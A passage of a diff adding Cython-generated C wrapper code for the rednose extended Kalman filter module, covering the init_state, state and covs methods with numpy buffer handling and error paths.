__Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 108, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_covs)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 108, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("init_state", 1, 3, 3, 1); __PYX_ERR(0, 108, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_filter_time)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 108, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("init_state", 1, 3, 3, 2); __PYX_ERR(0, 108, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "init_state") < 0)) __PYX_ERR(0, 108, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_state = ((PyArrayObject *)values[0]); + __pyx_v_covs = ((PyArrayObject *)values[1]); + __pyx_v_filter_time = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("init_state", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 108, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.init_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_state), __pyx_ptype_5numpy_ndarray, 1, "state", 0))) __PYX_ERR(0, 108, __pyx_L1_error) + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_covs), __pyx_ptype_5numpy_ndarray, 1, "covs", 0))) __PYX_ERR(0, 108, __pyx_L1_error) + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_2init_state(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v_state, __pyx_v_covs, __pyx_v_filter_time); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_2init_state(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, PyArrayObject *__pyx_v_state, PyArrayObject *__pyx_v_covs, PyObject *__pyx_v_filter_time) { + PyArrayObject *__pyx_v_state_b = 0; + PyArrayObject *__pyx_v_covs_b = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_covs; + __Pyx_Buffer __pyx_pybuffer_covs; + __Pyx_LocalBuf_ND __pyx_pybuffernd_covs_b; + __Pyx_Buffer __pyx_pybuffer_covs_b; + __Pyx_LocalBuf_ND __pyx_pybuffernd_state; + __Pyx_Buffer __pyx_pybuffer_state; + __Pyx_LocalBuf_ND __pyx_pybuffernd_state_b; + __Pyx_Buffer __pyx_pybuffer_state_b; + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyArrayObject *__pyx_t_6 = NULL; + PyArrayObject *__pyx_t_7 = NULL; + char *__pyx_t_8; + npy_intp *__pyx_t_9; + char *__pyx_t_10; + npy_intp *__pyx_t_11; + npy_intp *__pyx_t_12; + double __pyx_t_13; + int __pyx_t_14; + double __pyx_t_15; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__20) + __Pyx_RefNannySetupContext("init_state", 0); + __Pyx_TraceCall("init_state", __pyx_f[0], 108, 0, __PYX_ERR(0, 108, __pyx_L1_error)); + __pyx_pybuffer_state_b.pybuffer.buf = NULL; + __pyx_pybuffer_state_b.refcount = 0; + __pyx_pybuffernd_state_b.data = NULL; + __pyx_pybuffernd_state_b.rcbuffer = &__pyx_pybuffer_state_b; + __pyx_pybuffer_covs_b.pybuffer.buf = NULL; + __pyx_pybuffer_covs_b.refcount = 0; + __pyx_pybuffernd_covs_b.data = NULL; + __pyx_pybuffernd_covs_b.rcbuffer = &__pyx_pybuffer_covs_b; + __pyx_pybuffer_state.pybuffer.buf = NULL; + __pyx_pybuffer_state.refcount = 0; + __pyx_pybuffernd_state.data = NULL; + __pyx_pybuffernd_state.rcbuffer = &__pyx_pybuffer_state; + __pyx_pybuffer_covs.pybuffer.buf = NULL; + __pyx_pybuffer_covs.refcount = 0; + __pyx_pybuffernd_covs.data = NULL; + __pyx_pybuffernd_covs.rcbuffer = &__pyx_pybuffer_covs; + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_state.rcbuffer->pybuffer, (PyObject*)__pyx_v_state, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 1, 0, __pyx_stack) == -1)) __PYX_ERR(0, 108, __pyx_L1_error) + } + __pyx_pybuffernd_state.diminfo[0].strides = __pyx_pybuffernd_state.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_state.diminfo[0].shape = __pyx_pybuffernd_state.rcbuffer->pybuffer.shape[0]; + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_covs.rcbuffer->pybuffer, (PyObject*)__pyx_v_covs, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 2, 0, __pyx_stack) == -1)) __PYX_ERR(0, 108, __pyx_L1_error) + } + __pyx_pybuffernd_covs.diminfo[0].strides = __pyx_pybuffernd_covs.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_covs.diminfo[0].shape = __pyx_pybuffernd_covs.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_covs.diminfo[1].strides = __pyx_pybuffernd_covs.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_covs.diminfo[1].shape = __pyx_pybuffernd_covs.rcbuffer->pybuffer.shape[1]; + + /* "rednose/helpers/ekf_sym_pyx.pyx":109 + * + * def init_state(self, np.ndarray[np.float64_t, ndim=1] state, np.ndarray[np.float64_t, ndim=2] covs, filter_time): + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] state_b = np.ascontiguousarray(state, dtype=np.double) # <<<<<<<<<<<<<< + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] covs_b = np.ascontiguousarray(covs, dtype=np.double) + * self.ekf.init_state( + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF((PyObject *)__pyx_v_state); + __Pyx_GIVEREF((PyObject *)__pyx_v_state); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)__pyx_v_state)); + __pyx_t_3 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_double); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_dtype, __pyx_t_5) < 0) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 109, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (!(likely(((__pyx_t_5) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_5, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 109, __pyx_L1_error) + __pyx_t_6 = ((PyArrayObject *)__pyx_t_5); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_state_b.rcbuffer->pybuffer, (PyObject*)__pyx_t_6, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 1, 0, __pyx_stack) == -1)) { + __pyx_v_state_b = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_state_b.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 109, __pyx_L1_error) + } else {__pyx_pybuffernd_state_b.diminfo[0].strides = __pyx_pybuffernd_state_b.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_state_b.diminfo[0].shape = __pyx_pybuffernd_state_b.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_6 = 0; + __pyx_v_state_b = ((PyArrayObject *)__pyx_t_5); + __pyx_t_5 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":110 + * def init_state(self, np.ndarray[np.float64_t, ndim=1] state, np.ndarray[np.float64_t, ndim=2] covs, filter_time): + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] state_b = np.ascontiguousarray(state, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] covs_b = np.ascontiguousarray(covs, dtype=np.double) # <<<<<<<<<<<<<< + * self.ekf.init_state( + * MapVectorXd( state_b.data, state.shape[0]), + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_np); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_INCREF((PyObject *)__pyx_v_covs); + __Pyx_GIVEREF((PyObject *)__pyx_v_covs); + PyTuple_SET_ITEM(__pyx_t_5, 0, ((PyObject *)__pyx_v_covs)); + __pyx_t_1 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_np); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_double); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_dtype, __pyx_t_4) < 0) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_5, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 110, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (!(likely(((__pyx_t_4) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_4, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 110, __pyx_L1_error) + __pyx_t_7 = ((PyArrayObject *)__pyx_t_4); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_covs_b.rcbuffer->pybuffer, (PyObject*)__pyx_t_7, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 2, 0, __pyx_stack) == -1)) { + __pyx_v_covs_b = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_covs_b.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 110, __pyx_L1_error) + } else {__pyx_pybuffernd_covs_b.diminfo[0].strides = __pyx_pybuffernd_covs_b.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_covs_b.diminfo[0].shape = __pyx_pybuffernd_covs_b.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_covs_b.diminfo[1].strides = __pyx_pybuffernd_covs_b.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_covs_b.diminfo[1].shape = __pyx_pybuffernd_covs_b.rcbuffer->pybuffer.shape[1]; + } + } + __pyx_t_7 = 0; + __pyx_v_covs_b = ((PyArrayObject *)__pyx_t_4); + __pyx_t_4 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":112 + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] covs_b = np.ascontiguousarray(covs, dtype=np.double) + * self.ekf.init_state( + * MapVectorXd( state_b.data, state.shape[0]), # <<<<<<<<<<<<<< + * MapMatrixXdr( covs_b.data, covs.shape[0], covs.shape[1]), + * np.nan if filter_time is None else filter_time + */ + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_state_b)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 112, __pyx_L1_error) + __pyx_t_9 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_state)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 112, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":113 + * self.ekf.init_state( + * MapVectorXd( state_b.data, state.shape[0]), + * MapMatrixXdr( covs_b.data, covs.shape[0], covs.shape[1]), # <<<<<<<<<<<<<< + * np.nan if filter_time is None else filter_time + * ) + */ + __pyx_t_10 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_covs_b)); if (unlikely(__pyx_t_10 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 113, __pyx_L1_error) + __pyx_t_11 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_covs)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 113, __pyx_L1_error) + __pyx_t_12 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_covs)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 113, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":114 + * MapVectorXd( state_b.data, state.shape[0]), + * MapMatrixXdr( covs_b.data, covs.shape[0], covs.shape[1]), + * np.nan if filter_time is None else filter_time # <<<<<<<<<<<<<< + * ) + * + */ + __pyx_t_14 = (__pyx_v_filter_time == Py_None); + if (__pyx_t_14) { + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 114, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_nan); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 114, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_15 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_15 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 114, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_13 = __pyx_t_15; + } else { + __pyx_t_15 = __pyx_PyFloat_AsDouble(__pyx_v_filter_time); if (unlikely((__pyx_t_15 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 114, __pyx_L1_error) + __pyx_t_13 = __pyx_t_15; + } + + /* "rednose/helpers/ekf_sym_pyx.pyx":111 + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] state_b = np.ascontiguousarray(state, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] covs_b = np.ascontiguousarray(covs, dtype=np.double) + * self.ekf.init_state( # <<<<<<<<<<<<<< + * MapVectorXd( state_b.data, state.shape[0]), + * MapMatrixXdr( covs_b.data, covs.shape[0], covs.shape[1]), + */ + __pyx_v_self->ekf->init_state(Eigen::Map(((double *)__pyx_t_8), (__pyx_t_9[0])), Eigen::Map >(((double *)__pyx_t_10), (__pyx_t_11[0]), (__pyx_t_12[1])), __pyx_t_13); + + /* "rednose/helpers/ekf_sym_pyx.pyx":108 + * ) + * + * def init_state(self, np.ndarray[np.float64_t, ndim=1] state, np.ndarray[np.float64_t, ndim=2] covs, filter_time): # <<<<<<<<<<<<<< + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] state_b = np.ascontiguousarray(state, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] covs_b = np.ascontiguousarray(covs, dtype=np.double) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_covs.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_covs_b.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_state.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_state_b.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.init_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_covs.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_covs_b.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_state.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_state_b.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_state_b); + __Pyx_XDECREF((PyObject *)__pyx_v_covs_b); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":117 + * ) + * + * def state(self): # <<<<<<<<<<<<<< + * cdef np.ndarray res = vector_to_numpy(self.ekf.state()) + * return res + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_5state(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_5state = {"state", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_5state, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_5state(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("state (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("state", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "state", 0))) return NULL; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_4state(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_4state(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self) { + PyArrayObject *__pyx_v_res = 0; + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__21) + __Pyx_RefNannySetupContext("state", 0); + __Pyx_TraceCall("state", __pyx_f[0], 117, 0, __PYX_ERR(0, 117, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":118 + * + * def state(self): + * cdef np.ndarray res = vector_to_numpy(self.ekf.state()) # <<<<<<<<<<<<<< + * return res + * + */ + __pyx_t_1 = ((PyObject *)__pyx_f_7rednose_7helpers_11ekf_sym_pyx_vector_to_numpy(__pyx_v_self->ekf->state())); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 118, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_res = ((PyArrayObject *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":119 + * def state(self): + * cdef np.ndarray res = vector_to_numpy(self.ekf.state()) + * return res # <<<<<<<<<<<<<< + * + * def covs(self): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_res); + __pyx_r = ((PyObject *)__pyx_v_res); + goto __pyx_L0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":117 + * ) + * + * def state(self): # <<<<<<<<<<<<<< + * cdef np.ndarray res = vector_to_numpy(self.ekf.state()) + * return res + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_res); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":121 + * return res + * + * def covs(self): # <<<<<<<<<<<<<< + * return matrix_to_numpy(self.ekf.covs()) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_7covs(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_7covs = {"covs", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_7covs, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_7covs(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("covs (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("covs", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "covs", 0))) return NULL; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_6covs(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_6covs(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__22) + __Pyx_RefNannySetupContext("covs", 0); + __Pyx_TraceCall("covs", __pyx_f[0], 121, 0, __PYX_ERR(0, 121, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":122 + * + * def covs(self): + * return matrix_to_numpy(self.ekf.covs()) # <<<<<<<<<<<<<< + * + * def set_filter_time(self, double t): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((PyObject *)__pyx_f_7rednose_7helpers_11ekf_sym_pyx_matrix_to_numpy(__pyx_v_self->ekf->covs())); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 122, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":121 + * return res + * + * def covs(self): # <<<<<<<<<<<<<< + * return matrix_to_numpy(self.ekf.covs()) + * + */ + + /* function exit code */ + __pyx_L1_error:; 